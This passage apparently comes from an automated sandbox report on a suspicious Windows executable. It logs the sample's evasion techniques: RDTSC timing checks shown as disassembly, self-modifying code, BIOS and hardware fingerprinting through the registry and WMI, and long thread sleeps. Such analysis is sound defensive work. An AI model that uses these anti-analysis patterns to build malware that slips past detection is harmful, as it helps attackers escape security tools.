                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5FC1 second address: 6E5FFA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 43D67BEAh 0x00000013 sub dword ptr [ebp+150D1FF0h], esi 0x00000019 lea ebx, dword ptr [ebp+15253D8Ch] 0x0000001f mov dword ptr [ebp+150D24C1h], edi 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push esi 0x00000029 jmp 00007F7290766B2Fh 0x0000002e pop esi 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E5FFA second address: 6E6010 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7290C62CA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F7290C62CA6h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E6054 second address: 6E60B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 jng 00007F7290766B2Eh 0x0000000d nop 0x0000000e call 00007F7290766B31h 0x00000013 sub dword ptr [ebp+150D1FE6h], ecx 0x00000019 pop ecx 0x0000001a mov dx, 04A8h 0x0000001e push 00000000h 0x00000020 mov esi, dword ptr [ebp+150D2BEEh] 0x00000026 push 04ED1B32h 0x0000002b pushad 0x0000002c pushad 0x0000002d jmp 00007F7290766B39h 0x00000032 jng 00007F7290766B26h 0x00000038 popad 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6E6289 second address: 6E62FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7290766B30h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 6BAEA692h 0x00000012 mov edx, dword ptr [ebp+150D198Ch] 0x00000018 lea ebx, dword ptr [ebp+15253DA0h] 0x0000001e mov edi, 3BEA4B40h 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 ja 00007F7290766B3Eh 0x0000002b push ecx 0x0000002c pushad 0x0000002d popad 0x0000002e pop ecx 0x0000002f popad 0x00000030 push eax 0x00000031 pushad 0x00000032 jnp 00007F7290766B28h 0x00000038 pushad 0x00000039 popad 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F7290766B36h 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 704D30 second address: 704D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7290766B26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F7290766B2Eh 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 704EC3 second address: 704ED7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F7290C62CAEh 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7052DF second address: 70530B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7290C62CACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7290C62CB6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6D08EB second address: 6D090D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F7290C62CB2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 705761 second address: 705775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B30h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 70B04B second address: 70B063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B32h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSpecial instruction interceptor: First address: 735812 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeSpecial instruction interceptor: First address: 7128A3 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: 4F00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: 5150000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: 5090000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: 4DC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: 4FA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: 4D60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeMemory allocated: 6F00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow / User API: threadDelayed 8201Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow / User API: threadDelayed 1563Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWindow / User API: threadDelayed 9729Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -39830s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -39705s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -39580s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -39455s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -39330s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -39205s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -39080s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -38955s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -38830s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -38705s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -38580s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -38455s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -38330s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -38205s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -38080s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -37955s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -37799s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -37674s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -37549s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -37424s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -37299s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -37117s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36994s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36893s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36768s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36643s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36518s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36393s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36268s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36143s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -36017s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -35893s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -35768s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -35643s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -35518s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -35393s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -35268s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -35143s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -35018s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -34893s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -34768s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -34643s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -34395s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -34001s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -33877s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -33752s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -33627s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -33502s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -33377s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6172Thread sleep time: -33252s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 4752Thread sleep count: 117 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 4752Thread sleep time: -234117s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 5320Thread sleep count: 110 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 5320Thread sleep time: -220110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 4072Thread sleep count: 135 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 4072Thread sleep time: -270135s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6048Thread sleep time: -68000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 1288Thread sleep count: 131 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 1288Thread sleep time: -262131s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 5668Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 5668Thread sleep time: -39830s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 4708Thread sleep count: 121 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 4708Thread sleep time: -242121s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6020Thread sleep count: 133 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 6020Thread sleep time: -266133s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 5668Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -39830s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -39658s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -39547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -39408s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -39283s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -39158s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -39033s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -38908s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -38783s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -38658s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -38533s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -38408s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -38285s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -38173s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -37799s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -37393s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -37267s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -37127s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -37002s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -36877s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -36752s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -36642s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -36502s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -36377s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -36252s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -36127s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -36017s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -35877s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -35752s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -35642s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -35502s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -35393s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -35252s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -35142s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -34978s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -34487s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -34362s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -34237s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -34111s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -33986s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -33862s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -33736s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -33611s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -33486s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -33361s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -33236s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -33111s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -32987s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -32861s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -32736s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -32612s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -32486s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exe TID: 3856Thread sleep time: -32346s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39830Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39705Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39580Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39455Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39330Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39205Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 39080Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38955Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38830Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38705Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38580Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38455Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38330Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38205Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 38080Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37955Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37799Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37674Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37549Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37424Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37299Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 37117Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36994Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36893Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36768Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36643Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36518Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36393Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36268Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36143Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 36017Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35893Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35768Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35643Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35518Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35393Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35268Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35143Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 35018Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 34893Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 34768Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 34643Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 34395Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 34001Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33877Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33752Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33627Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33502Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33377Jump to behavior
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeThread delayed: delay time: 33252Jump to behavior
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 39658
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 39547
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 39408
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 39283
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 39158
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 39033
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 38908
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 38783
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 38658
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 38533
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 38408
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 38285
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 38173
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 37799
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 37393
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 37267
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 37127
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 37002
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 36877
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 36752
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 36642
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 36502
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 36377
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 36252
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 36127
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 36017
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 35877
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 35752
Source: C:\Users\user\Desktop\DQmU06kq9I.exe Thread delayed: delay time: 35642
